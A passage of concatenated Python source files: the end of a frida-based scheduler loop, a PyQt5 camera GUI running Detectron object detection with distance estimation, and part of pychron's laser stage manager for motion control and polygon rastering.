self._run_until_return(self)
self.stop()
worker.join()
def _run(self):
running = True
while running:
now = time.time()
work = None
timeout = None
previous_pending_length = -1
with self._lock:
for item in self._pending:
(f, when) = item
if now >= when:
work = f
self._pending.remove(item)
break
if len(self._pending) > 0:
timeout = max([min(map(lambda item: item[1], self._pending)) - now, 0])
previous_pending_length = len(self._pending)
if work is not None:
with self.io_cancellable:
try:
work()
except frida.OperationCancelledError:
pass
with self._lock:
if self._running and len(self._pending) == previous_pending_length:
self._cond.wait(timeout)
running = self._running
if self._on_stop is not None:
self._on_stop()
self.ui_cancellable.cancel()
def stop(self):
self.schedule(self._stop)
def _stop(self):
with self._lock:
self._running = False
def schedule(self, f, delay=None):
now = time.time()
if delay is not None:
when = now + delay
else:
when = now
with self._lock:
self._pending.append((f, when))
self._cond.notify()
def cancel_io(self):
self.io_cancellable.cancel()
|
gui.py
|
#!/usr/bin/python2
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'camara_ui.ui'
#
# Created by: PyQt5 UI code generator 5.5.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
import sys
import cv2
import numpy as np
import threading
import time
import Queue
running = False
capture_thread = None
q = Queue.Queue()
# q = Queue.Queue(maxsize=10)
from collections import defaultdict
import argparse
import glob
import logging
import os
import math
reload(sys)
sys.setdefaultencoding('utf-8')
sys.path.append('/home/vpa/github/caffe2/build')
sys.path.append('/home/vpa/github/cocoapi/PythonAPI')
from caffe2.python import workspace
from PIL import Image, ImageDraw, ImageFont
from core.config import assert_and_infer_cfg
from core.config import cfg
from core.config import merge_cfg_from_file
from utils.timer import Timer
import core.test_engine as infer_engine
import datasets.dummy_datasets as dummy_datasets
import utils.c2 as c2_utils
c2_utils.import_detectron_ops()
# OpenCL may be enabled by default in OpenCV3; disable it because it's not
# thread safe and causes unwanted GPU memory allocations.
cv2.ocl.setUseOpenCL(False)
_GRAY = (218, 227, 218)
_GREEN = (18, 127, 15)
_WHITE = (255, 255, 255)
def parse_args():
parser = argparse.ArgumentParser(description='End-to-end inference')
parser.add_argument(
'--cfg',
dest='cfg',
help='cfg model file (/path/to/model_config.yaml)',
default='/home/vpa/github/Detectron/configs/12_2017_baselines/e2e_faster_rcnn_R-50-FPN_2x.yaml',
type=str
)
parser.add_argument(
'--wts',
dest='weights',
help='weights model file (/path/to/model_weights.pkl)',
default='/home/vpa/models/detectron/e2e_faster_rcnn_R-50-FPN_2x.pkl',
type=str
)
# if len(sys.argv) == 1:
# parser.print_help()
# sys.exit(1)
return parser.parse_args()
def get_class_string(class_index, score, class_names):
class_text = class_names[class_index] if class_names is not None else \
'id{:d}'.format(class_index)
# return class_text + ' {:0.2f}'.format(score).lstrip('0')
return class_text
def vis_class(img, pos, class_str, theta, radius, font_scale=0.35):
"""Visualizes the class."""
x0, y0 = int(pos[0]), int(pos[1])
# if theta > 0:
# thetaText = u' 右前方%d度'%math.fabs(theta)
# elif theta ==0:
# thetaText = u' 正前方' % math.fabs(theta)
# else:
# thetaText = u' 左前方%d度' % math.fabs(theta)
thetaText = u'%d度'%(90-theta)
distText=u'%.2f米'%radius
txt = class_str+thetaText+distText
# cv2 to pil
cv2_im = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # cv2和PIL中颜色的hex码的储存顺序不同
pil_im = Image.fromarray(cv2_im)
# draw pil
draw = ImageDraw.Draw(pil_im) # 括号中为需要打印的canvas,这里就是在图片上直接打印
font = ImageFont.truetype("/usr/share/fonts/truetype/simsun.ttc", 15, encoding="utf-8") # 第一个参数为字体文件路径,第二个为字体大小
draw.text((x0, y0-15), txt, (0, 255, 0), font=font) # 第一个参数为打印的坐标,第二个为打印的文本,第三个为字体颜色,第四个为字体
# pil to cv2
img = cv2.cvtColor(np.array(pil_im), cv2.COLOR_RGB2BGR)
#cv2.imshow("detect", img)
# Compute text size.
# txt = class_str
# font = cv2.FONT_HERSHEY_SIMPLEX
# ((txt_w, txt_h), _) = cv2.getTextSize(txt, font, font_scale, 1)
# Place text background.
# back_tl = x0, y0 - int(1.3 * txt_h)
# back_br = x0 + txt_w, y0
# cv2.rectangle(img, back_tl, back_br, _GREEN, -1)
# Show text.
# txt_tl = x0, y0 - int(0.3 * txt_h)
# cv2.putText(img, txt, txt_tl, font, font_scale, _GRAY, lineType=cv2.LINE_AA)
return img
def vis_bbox(img, bbox, thick=1, color=_GREEN):
"""Visualizes a bounding box."""
(x0, y0, w, h) = bbox
x1, y1 = int(x0 + w), int(y0 + h)
x0, y0 = int(x0), int(y0)
cv2.rectangle(img, (x0, y0), (x1, y1), color, thickness=thick)
return img
def computeaspect(bbox):
"""compute distance and aspect of the object ."""
u, v = (bbox[0] + bbox[2]) / 2.0, bbox[3]
x = 0.0230 * u - ((0.9996 * u - 550.3179) * (37.6942 * v - 2.2244e+06)) / (
1.6394e+03 * v - 4.1343e+05) - 12.9168
y = ((0.0070 * u - 1.6439e+03) * (37.6942 * v - 2.2244e+06)) / (
1.6394e+03 * v - 4.1343e+05) - 1.6046e-04 * u + 0.0902
theta = math.degrees(math.atan2(y, x))
radius = math.sqrt(x ** 2 + y ** 2)/1000
return theta, radius
def demo_vis_one_imageboxes_opencv(im, cls_boxes, thresh=[], show_box=False,dataset=None, show_class=False,
class_names=[], color_list=[], cls_sel=[],queue=[],frame=[],count=[],start_time=[]):
"""Constructs a numpy array with the detections visualized."""
box_list = [b for b in [cls_boxes[i] for i in cls_sel] if len(b) > 0]
if len(box_list) > 0:
boxes = np.concatenate(box_list)
else:
boxes = None
classes = []
# for j in range(len(cls_boxes)):
for j in cls_sel:
# print(len(cls_boxes[j]))
classes += [j] * len(cls_boxes[j])
if boxes is None or boxes.shape[0] == 0 or max(boxes[:, 4]) < min(thresh):
return im
# for i in sorted_inds:
for i, cls_id in enumerate(classes[0:]):
bbox = boxes[i, :4]
score = boxes[i, -1]
if score < thresh[cls_id]:
continue
theta, radius = computeaspect(bbox)
# show box (off by default)
if show_box:
im = vis_bbox(
im, (bbox[0], bbox[1], bbox[2] - bbox[0], bbox[3] - bbox[1]), color=color_list[cls_id])
# show class (off by default)
if show_class:
class_str = get_class_string(classes[i], score, class_names)
im = vis_class(im, (bbox[0], bbox[1], bbox[2], bbox[3]), class_str, theta, radius)
# avg_fps = (count-4) / (time.time() - start_time)
# cv2.putText(im, '{:s} {:.1f}/s'.format('fps', avg_fps), (40, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255),
# lineType=cv2.LINE_AA)
frame["img"] = im
# if queue.qsize() < 10:
# queue.put(frame)
# else:
# break
return frame
def camera(cam, queue, width, height, fps, args):
global running
logger = logging.getLogger(__name__)
merge_cfg_from_file(args.cfg)
cfg.TEST.WEIGHTS = args.weights
cfg.NUM_GPUS = 1
assert_and_infer_cfg()
model = infer_engine.initialize_model_from_cfg()
dummy_coco_dataset = dummy_datasets.get_coco_dataset()
start_time = 0
count = 0
# class_names =[
# '__background__', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
# 'bus', 'train', 'truck']
# color_list=[[0,0,0],[255,0,0],[0,255,0],[0,0,255],[255,255,0],[0,255,255],[255,255,0],[255,0,255],[255,255,255]]
class_names = [
'__background__', u'人', u'自行车', u'车', u'摩托车', 'airplane',
u'车', 'train', u'车']
color_list = [[0, 0, 0], [255, 0, 0], [0, 255, 0], [0, 0, 255], [255, 255, 0], [0, 0, 255], [0, 0, 255],
[255, 0, 255], [0, 0, 255]]
cls_sel = [1, 2, 3, 4, 6, 8]
cls_thresh = [1, 0.8, 0.6, 0.9, 0.6, 0.9, 0.8, 0.9, 0.8]
if count == 0:
logger.info(
' \ Note: inference on the first image will be slower than the '
'rest (caches and auto-tuning need to warm up)'
)
capture = cv2.VideoCapture(cam)
capture.set(cv2.CAP_PROP_FRAME_WIDTH, width)
capture.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
# capture.set(cv2.CAP_PROP_FPS, fps)
# size = (int(capture.get(cv2.CAP_PROP_FRAME_WIDTH)), int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT)))
#print(cv2.__version__)
total=0
while (1):
frame = {}
ret, im = capture.read()
# timers = defaultdict(Timer)
# # detect one image
if running==False:
frame["img"]=im
count =0
else:
if count==5:
start_time = time.time()
count = count + 1
with c2_utils.NamedCudaScope(0):
cls_boxes, _, _ = infer_engine.im_detect_all(
model, im, None, timers=None)
demo_vis_one_imageboxes_opencv(im, cls_boxes, thresh=cls_thresh, show_box=True, dataset=dummy_coco_dataset,
show_class=True, class_names=class_names, color_list=color_list, cls_sel=cls_sel,
queue=q,frame=frame)
if count>=5:
avg_fps = (count-4) / (time.time() - start_time)
cv2.putText(frame["img"], '{:s} {:.2f}/s'.format('fps', avg_fps), (40, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 128, 255),
lineType=cv2.LINE_AA)
queue.put(frame)
print(queue.qsize())
# if queue.qsize() >= 10:
# break
# frame["img"] = im
# if queue.qsize() < 20:
# queue.put(frame)
# else:
# break
# print(queue.qsize())
# if queue.qsize() >= 10:
# break
# print(queue.qsize())
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
class OwnImageWidget(QtWidgets.QWidget):
def __init__(self, parent=None):
super(OwnImageWidget, self).__init__(parent)
self.image = None
def setImage(self, image):
self.image = image
sz = image.size()
self.setMinimumSize(sz)
self.update()
def paintEvent(self, event):
qp = QtGui.QPainter()
qp.begin(self)
if self.image:
qp.drawImage(QtCore.QPoint(0, 0), self.image)
qp.end()
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(2560, 1440)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayoutWidget = QtWidgets.QWidget(self.centralwidget)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(180, 160, 2000, 1200))
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setObjectName("verticalLayout")
self.horizentalLayout = QtWidgets.QHBoxLayout(self.verticalLayoutWidget)
self.horizentalLayout.setObjectName("horizentalLayout")
self.startButton = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.stopButton = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.exitButton = QtWidgets.QPushButton(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(15)
#start button
self.startButton.setFont(font)
self.startButton.setObjectName("startButton")
self.horizentalLayout.addWidget(self.startButton)
self.horizentalLayout.addSpacing(30)
#stop button
self.stopButton.setFont(font)
self.stopButton.setObjectName("stopButton")
self.horizentalLayout.addWidget(self.stopButton)
self.horizentalLayout.addSpacing(30)
# exit button
self.exitButton.setFont(font)
self.exitButton.setObjectName("exitButton")
self.horizentalLayout.addWidget(self.exitButton)
self.verticalLayout.addLayout(self.horizentalLayout, stretch=0)
# self.verticalLayout.addSpacing(5)
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(0, 0, 180, 180))
self.label.setObjectName("logo")
jpg = QtGui.QPixmap('/home/vpa/github/Detectron_jdy/tools/logo2.jpg')
self.label.setPixmap(jpg)
MainWindow.setCentralWidget(self.centralwidget)
self.groupBox = QtWidgets.QGroupBox(self.verticalLayoutWidget)
self.groupBox.setObjectName("groupBox")
self.widget = QtWidgets.QWidget(self.groupBox)
self.widget.setGeometry(QtCore.QRect(0, 20, 2000, 1200))
self.widget.setObjectName("widget")
self.verticalLayout.addWidget(self.groupBox)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 789, 25))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(700, 60, 1000, 91))
font = QtGui.QFont()
font.setPointSize(25)
self.label.setFont(font)
self.label.setObjectName("label")
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
self.startButton.clicked.connect(self.start_clicked)
self.stopButton.clicked.connect(self.stop_clicked)
self.exitButton.clicked.connect(self.exit_clicked)
self.window_width = self.widget.frameSize().width()
self.window_height = self.widget.frameSize().height()
self.ImgWidget = OwnImageWidget(self.widget)
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.update_frame)
self.timer.start(1)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "目标检测系统"))
self.startButton.setText(_translate("MainWindow", "开始检测"))
self.stopButton.setText(_translate("MainWindow", "结束检测"))
self.exitButton.setText(_translate("MainWindow", "退出"))
self.groupBox.setTitle(_translate("MainWindow", ""))
self.label.setText(_translate("MainWindow", "天津大学视觉模式分析实验室目标检测系统"))
def start_clicked(self):
global running
running = True
# capture_thread.start()
self.startButton.setEnabled(False)
self.startButton.setText('准备检测')
def stop_clicked(self):
global running
running = False
self.stopButton.setEnabled(False)
self.stopButton.setText('正在结束')
self.startButton.setEnabled(False)
self.startButton.setText('正在结束检测')
self.stopButton.setEnabled(True)
self.stopButton.setText('结束检测')
self.startButton.setEnabled(True)
self.startButton.setText('开始检测')
def exit_clicked(self):
# capture_thread.stop()
# capture_thread.join()
capture_thread.exit()
def update_frame(self):
if not q.empty():
self.startButton.setText('正在检测')
frame = q.get()
img = frame["img"]
img_height, img_width, img_colors = img.shape
scale_w = float(self.window_width) / float(img_width)
scale_h = float(self.window_height) / float(img_height)
scale = min([scale_w, scale_h])
if scale == 0:
scale = 1
img = cv2.resize(img, None, fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
height, width, bpc = img.shape
bpl = bpc * width
image = QtGui.QImage(img.data, width, height, bpl, QtGui.QImage.Format_RGB888)
self.ImgWidget.setImage(image)
q.task_done()
def closeEvent(self, event):
global running
running = False
if __name__ == "__main__":
import sys
capture_thread = threading.Thread(target=camera, args=(0, q, 800, 600, 30, parse_args()))
capture_thread.start()
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
stage_manager.py
|
# ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
import os
import time
from numpy import array, asarray
# =============enthought library imports=======================
from traits.api import DelegatesTo, Instance, Button, List, String, Event, Bool
from pychron.canvas.canvas2D.laser_tray_canvas import LaserTrayCanvas
from pychron.core.geometry.convex_hull import convex_hull
from pychron.core.geometry.geometry import sort_clockwise
from pychron.core.geometry.polygon_offset import polygon_offset
from pychron.core.helpers.filetools import add_extension
from pychron.core.helpers.strtools import csv_to_floats
from pychron.core.ui.preference_binding import bind_preference, ColorPreferenceBinding
from pychron.core.ui.thread import Thread
from pychron.experiment.utilities.position_regex import (
POINT_REGEX,
XY_REGEX,
TRANSECT_REGEX,
)
from pychron.hardware.motion_controller import (
MotionController,
TargetPositionError,
ZeroDisplacementException,
)
from pychron.lasers.points.points_programmer import PointsProgrammer
from pychron.managers.motion_controller_managers.motion_controller_manager import (
MotionControllerManager,
)
from pychron.paths import paths
from pychron.stage.stage_manager import BaseStageManager
def distance_threshold(p1, p2, tol):
if p2 is None:
return True
x1, y1 = p1
x2, y2 = p2
return ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5 > tol
class StageManager(BaseStageManager):
""" """
stage_controller_klass = String("Newport")
stage_controller = Instance(MotionController)
points_programmer = Instance(PointsProgrammer)
motion_controller_manager = Instance(MotionControllerManager)
# canvas = Instance(LaserTrayCanvas)
simulation = DelegatesTo("stage_controller")
# stage_map_klass = StageMap
# _stage_map = Instance(StageMap)
# stage_map = Property(depends_on='_stage_map')
# stage_maps = Property(depends_on='_stage_maps')
# _stage_maps = List
# ===========================================================================
# buttons
# ===========================================================================
home = Button("home")
home_option = String("Home All")
home_options = List
manual_override_position_button = Event
ejoystick = Event
joystick_label = String("Enable Joystick")
joystick = Bool(False)
joystick_timer = None
back_button = Button
stop_button = Button("Stop")
_default_z = 0
_cached_position = None
_cached_current_hole = None
_homing = False
def __init__(self, *args, **kw):
""" """
super(StageManager, self).__init__(*args, **kw)
self.stage_controller = self._stage_controller_factory()
def measure_grain_polygon(self):
pass
def stop_measure_grain_polygon(self):
pass
def shutdown(self):
self._save_stage_map()
def create_device(self, *args, **kw):
dev = super(StageManager, self).create_device(*args, **kw)
dev.parent = self
return dev
def goto_position(self, v, **kw):
if XY_REGEX[0].match(v):
self._move_to_calibrated_position(v)
elif POINT_REGEX.match(v) or TRANSECT_REGEX[0].match(v):
self.move_to_point(v)
else:
self.move_to_hole(v, user_entry=True, **kw)
def get_current_position(self, **kw):
if self.stage_controller:
x = self.stage_controller.x
y = self.stage_controller.y
return x, y
def get_current_hole(self):
pos = self.get_current_position()
if self.stage_map:
if distance_threshold(
pos, self._cached_position, self.stage_map.g_dimension / 4
):
h = self.get_calibrated_hole(*pos, tol=self.stage_map.g_dimension / 2.0)
if h is not None:
self._cached_current_hole = h
self._cached_position = pos
return self._cached_current_hole
def is_auto_correcting(self):
return False
def cancel_auto_correcting(self):
return True
def bind_preferences(self, pref_id):
bind_preference(self.canvas, "show_grids", "{}.show_grids".format(pref_id))
self.canvas.change_grid_visibility()
bind_preference(
self.canvas, "show_laser_position", "{}.show_laser_position".format(pref_id)
)
bind_preference(
self.canvas,
"show_desired_position",
"{}.show_desired_position".format(pref_id),
)
bind_preference(
self.canvas,
"desired_position_color",
"{}.desired_position_color".format(pref_id),
factory=ColorPreferenceBinding,
)
# bind_preference(self.canvas, 'render_map', '{}.render_map'.format(pref_id))
#
bind_preference(
self.canvas, "crosshairs_kind", "{}.crosshairs_kind".format(pref_id)
)
for tag in ("", "aux_"):
for key in ("line_width", "color", "radius", "offsetx", "offsety"):
key = "{}crosshairs_{}".format(tag, key)
factory = ColorPreferenceBinding if key.endswith("color") else None
pref = "{}.{}".format(pref_id, key)
bind_preference(self.canvas, key, pref, factory=factory)
# bind_preference(self.canvas, '{}crosshairs_line_width', '{}.{}crosshairs_line_width'.format(pref_id))
# bind_preference(self.canvas, 'crosshairs_color',
# '{}.crosshairs_color'.format(pref_id),
# factory=ColorPreferenceBinding)
# bind_preference(self.canvas, 'crosshairs_radius', '{}.crosshairs_radius'.format(pref_id))
# bind_preference(self.canvas, 'crosshairs_offsetx', '{}.crosshairs_offsetx'.format(pref_id))
# bind_preference(self.canvas, 'crosshairs_offsety', '{}.crosshairs_offsety'.format(pref_id))
bind_preference(
self.canvas, "show_hole_label", "{}.show_hole_label".format(pref_id)
)
bind_preference(
self.canvas, "hole_label_color", "{}.hole_label_color".format(pref_id)
)
bind_preference(
self.canvas, "hole_label_size", "{}.hole_label_size".format(pref_id)
)
self.canvas.handle_hole_label_size(self.canvas.hole_label_size)
bind_preference(self.canvas, "scaling", "{}.scaling".format(pref_id))
bind_preference(
self.canvas, "show_bounds_rect", "{}.show_bounds_rect".format(pref_id)
)
self.canvas.request_redraw()
def load(self):
super(StageManager, self).load()
config = self.get_configuration()
if config:
self._default_z = self.config_get(
config, "Defaults", "z", default=13, cast="float"
)
self.points_programmer.load_stage_map(self.stage_map_name)
# load the calibration file
# should have calibration files for each stage map
self.tray_calibration_manager.load_calibration()
def finish_loading(self):
self.initialize_stage()
def initialize_stage(self):
self.update_axes()
axes = self.stage_controller.axes
self.home_options = ["Home All", "XY"] + sorted(
[axes[a].name.upper() for a in axes]
)
self.canvas.parent = self
def save_calibration(self, name):
self.tray_calibration_manager.save_calibration(name=name)
# def add_stage_map(self, v):
# sm = self.stage_map_klass(file_path=v)
# psm = self._get_stage_map_by_name(sm.name)
# if psm:
# self._stage_maps.remove(psm)
# self._stage_maps.append(sm)
def accept_point(self):
self.points_programmer.accept_point()
def set_stage_map(self, v):
return self._set_stage_map(v)
def single_axis_move(self, *args, **kw):
return self.stage_controller.single_axis_move(*args, **kw)
def linear_move(
self,
x,
y,
use_calibration=True,
check_moving=False,
abort_if_moving=False,
**kw
):
if check_moving:
if self.moving():
self.warning("MotionController already in motion")
if abort_if_moving:
self.warning("Move to {},{} aborted".format(x, y))
return
else:
self.stop()
self.debug("Motion stopped. moving to {},{}".format(x, y))
pos = (x, y)
if use_calibration:
pos = self.get_calibrated_position(pos)
f = lambda x: "{:0.5f},{:0.5f}".format(*x)
self.debug("%%%%%%%%%%%%%%%%% mapped {} to {}".format(f((x, y)), f(pos)))
self.stage_controller.linear_move(*pos, **kw)
def move_to_hole(self, hole, **kw):
if self.stage_map.check_valid_hole(hole, **kw):
self._move(self._move_to_hole, hole, name="move_to_hole", **kw)
def move_to_point(self, pt):
self._move(self._move_to_point, pt, name="move_to_point")
def move_polyline(self, line):
self._move(self._move_to_line, line, name="move_to_line")
def move_polygon(self, poly):
self._move(self._move_polygon, poly, name="move_polygon")
def drill_point(self, pt):
self._move(self._drill_point, pt, name="drill_point")
def set_x(self, value, **kw):
return self.stage_controller.single_axis_move("x", value, **kw)
def set_y(self, value, **kw):
return self.stage_controller.single_axis_move("y", value, **kw)
def set_z(self, value, **kw):
return self.stage_controller.single_axis_move("z", value, **kw)
def set_xy(self, x, y, **kw):
hole = self._get_hole_by_position(x, y)
if hole:
self.move_to_hole(hole)
# self._set_hole(hole.id)
# self.move_to_hole(hole.id)
# self._set_hole(hole.id)
else:
return self.linear_move(x, y, **kw)
def get_hole(self, name):
if self.stage_map:
return self.stage_map.get_hole(name)
def move_to_load_position(self):
""" """
x, y, z = self.stage_controller.get_load_position()
self.info("moving to load position, x={}, y={}, z={}".format(x, y, z))
self.stage_controller.linear_move(x, y, grouped_move=False, block=False)
self.stage_controller.set_z(z)
self.stage_controller.block()
def stop(self, ax_key=None, verbose=False):
self._stop(ax_key, verbose)
def relative_move(self, *args, **kw):
self.stage_controller.relative_move(*args, **kw)
def key_released(self):
sc = self.stage_controller
sc.add_consumable((sc.update_axes, tuple()))
def moving(self, force_query=False, **kw):
moving = False
if force_query:
moving = self.stage_controller.moving(**kw)
elif self.stage_controller.timer is not None:
moving = self.stage_controller.timer.isActive()
return moving
def get_brightness(self, **kw):
return 0
def get_scores(self, **kw):
return 0, 0
def define_home(self, **kw):
self.stage_controller.define_home(**kw)
def get_z(self):
return self.stage_controller._z_position
def get_uncalibrated_xy(self, pos=None):
if pos is None:
pos = (self.stage_controller.x, self.stage_controller.y)
if self.stage_controller.xy_swapped():
pos = pos[1], pos[0]
canvas = self.canvas
ca = canvas.calibration_item
if ca:
pos = self.stage_map.map_to_uncalibration(
pos, ca.center, ca.rotation, ca.scale
)
return pos
def get_calibrated_xy(self):
pos = (self.stage_controller.x, self.stage_controller.y)
if self.stage_controller.xy_swapped():
pos = pos[1], pos[0]
pos = self.canvas.map_offset_position(pos)
return self.get_calibrated_position(pos)
def get_calibrated_hole(self, x, y, tol):
ca = self.canvas.calibration_item
if ca is not None:
smap = self.stage_map
xx, yy = smap.map_to_uncalibration((x, y), ca.center, ca.rotation)
return next(
(
hole
for hole in smap.sample_holes
if abs(hole.x - xx) < tol and abs(hole.y - yy) < tol
),
None,
)
def get_hole_xy(self, key):
hole = self.stage_map.get_hole(key)
self.debug("hole {} for {}".format(hole, key))
if hole:
if hole.has_correction():
pos = hole.corrected_position
style = "corrected"
else:
style = "calibrated"
pos = hole.nominal_position
pos = self.get_calibrated_position(pos)
self.debug("using {} position={}".format(style, pos))
return pos
# pos = self.stage_map.get_corrected_hole_pos(key)
# pos = self.stage_map.get_hole_pos(key)
# self.debug('hole: {} original x,y = {}'.format(key, pos))
# if pos:
# map the position to calibrated space
# pos = self.get_calibrated_position(pos)
# return pos
def finish_move_to_hole(self, user_entry):
pass
# private
def _update_axes(self):
if self.stage_controller:
self.stage_controller.update_axes()
def _home(self):
""" """
if self._homing:
return
self._homing = True
if self.home_option == "Home All":
msg = "homing all motors"
homed = ["x", "y", "z"]
home_kwargs = dict(x=-25, y=-25, z=50)
elif self.home_option == "XY":
msg = "homing x,y"
homed = ["x", "y"]
home_kwargs = dict(x=-25, y=-25)
else:
# define_home =
msg = "homing {}".format(self.home_option)
home_kwargs = {
self.home_option: -25 if self.home_option in ["X", "Y"] else 50
}
homed = [self.home_option.lower().strip()]
self.info(msg)
# if define_home:
self.stage_controller.set_home_position(**home_kwargs)
self.stage_controller.home(homed)
# explicitly block
# self.stage_controller.block()
if "z" in homed and "z" in self.stage_controller.axes:
# will be a positive limit error in z
# self.stage_controller.read_error()
time.sleep(1)
self.info("setting z to nominal position. {} mm ".format(self._default_z))
self.stage_controller.single_axis_move("z", self._default_z, block=True)
self.stage_controller._z_position = self._default_z
if self.home_option in ["XY", "Home All"]:
time.sleep(0.25)
# the stage controller should think x and y are at -25,-25
self.stage_controller._x_position = -25
self.stage_controller._y_position = -25
self.info("moving to center")
try:
self.stage_controller.linear_move(0, 0, block=True, sign_correct=False)
except TargetPositionError as e:
self.warning_dialog("Move Failed. {}".format(e))
self._homing = False
def _get_hole_by_position(self, x, y):
if self.stage_map:
return self.stage_map._get_hole_by_position(x, y)
def _get_hole_by_name(self, key):
sm = self.stage_map
return sm.get_hole(key)
# ===============================================================================
# special move
# ===============================================================================
def _stop(self, ax_key=None, verbose=False):
self.stage_controller.stop(ax_key=ax_key, verbose=verbose)
if self.parent.pattern_executor:
self.parent.pattern_executor.stop()
# def _move(self, func, pos, name=None, *args, **kw):
# if pos is None:
# return
#
# if self.move_thread and self.move_thread.isRunning():
# self.stage_controller.stop()
# if name is None:
# name = func.func_name
#
# self.move_thread = Thread(name='stage.{}'.format(name),
# target=func, args=(pos,) + args, kwargs=kw)
# self.move_thread.start()
def _drill_point(self, pt):
zend = pt.zend
vel = pt.velocity
# assume already at zstart
st = time.time()
self.info("start drilling. move to {}. velocity={}".format(zend, vel))
self.set_z(zend, velocity=vel, block=True)
et = time.time() - st
self.info("drilling complete. drilled for {}s".format(et))
def _move_polygon(
self,
pts,
velocity=5,
offset=50,
use_outline=True,
find_min=False,
scan_size=None,
use_move=True,
use_convex_hull=True,
motors=None,
verbose=True,
start_callback=None,
end_callback=None,
):
"""
motors is a dict of motor_name:value pairs
"""
if pts is None:
return
if not isinstance(pts, list):
velocity = pts.velocity
use_convex_hull = pts.use_convex_hull
if scan_size is None:
scan_size = pts.scan_size
use_outline = pts.use_outline
offset = pts.offset
find_min = pts.find_min
pts = [
dict(
xy=(pi.x, pi.y),
z=pi.z,
)
for pi in pts.points
]
# set motors
if motors is not None:
for k, v in motors.values():
"""
motor will not set if it has been locked using set_motor_lock or
remotely using SetMotorLock
"""
if use_move:
self.parent.set_motor(k, v, block=True)
xy = [pi["xy"] for pi in pts]
n = 1000
if scan_size is None:
scan_size = n / 2
# convert points to um
pts = array(xy)
pts *= n
pts = asarray(pts, dtype=int)
"""
sort clockwise ensures consistent offset behavior
a polygon gain have a inner or outer sense depending on order of vertices
always use sort_clockwise prior to any polygon manipulation
"""
pts = sort_clockwise(pts, pts)
sc = self.stage_controller
sc.set_program_mode("absolute")
# do smooth transitions between points
sc.set_smooth_transitions(True)
if use_convex_hull:
pts = convex_hull(pts)
if use_outline:
# calculate new polygon
offset_pts = polygon_offset(pts, -offset)
offset_pts = array(offset_pts, dtype=int)
# polygon offset used 3D vectors.
# trim to only x,y
pts = offset_pts[:, (0, 1)]
# trace perimeter
if use_move:
p0 = xy[0]
self.linear_move(p0[0], p0[1], mode="absolute", block=True)
sc.timer = sc.timer_factory()
if start_callback is not None:
start_callback()
# buf=[]
for pi in xy[1:]:
self.linear_move(
pi[0],
pi[1],
velocity=velocity,
mode="absolute",
set_stage=False,
)
# finish at first point
self.linear_move(
p0[0], p0[1], velocity=velocity, mode="absolute", set_stage=False
)
sc.block()
self.info("polygon perimeter trace complete")
"""
have the oppurtunity here to turn off laser and change parameters i.e mask
"""
if use_move:
# calculate and step thru scan lines
self._raster(
pts,
velocity,
step=scan_size,
scale=n,
find_min=find_min,
start_callback=start_callback,
end_callback=end_callback,
verbose=verbose,
)
sc.set_program_mode("relative")
if end_callback is not None:
end_callback()
self.info("polygon raster complete")
def _raster(
self,
points,
velocity,
step=500,
scale=1000,
find_min=False,
start_callback=None,
end_callback=None,
verbose=False,
):
from pychron.core.geometry.scan_line import raster
lines = raster(points, step=step, find_min=find_min)
# initialize variables
cnt = 0
direction = 1
flip = False
lasing = False
sc = self.stage_controller
if verbose:
self.info("start raster")
# print lines
# loop thru each scan line
# for yi, xs in lines[::skip]:
for yi, xs in lines:
if direction == -1:
xs = list(reversed(xs))
# convert odd numbers lists to even
n = len(xs)
if n % 2 != 0:
xs = sorted(list(set(xs)))
# traverse each x-intersection pair
n = len(xs)
for i in range(0, n, 2):
if len(xs) <= 1:
continue
x1, x2, yy = xs[i] / scale, xs[i + 1] / scale, yi / scale
if abs(x1 - x2) > 1e-10:
if not lasing:
if verbose:
self.info("fast to {} {},{}".format(cnt, x1, yy))
self.linear_move(
x1, yy, mode="absolute", set_stage=False, block=True
)
if start_callback is not None:
start_callback()
lasing = True
else:
if verbose:
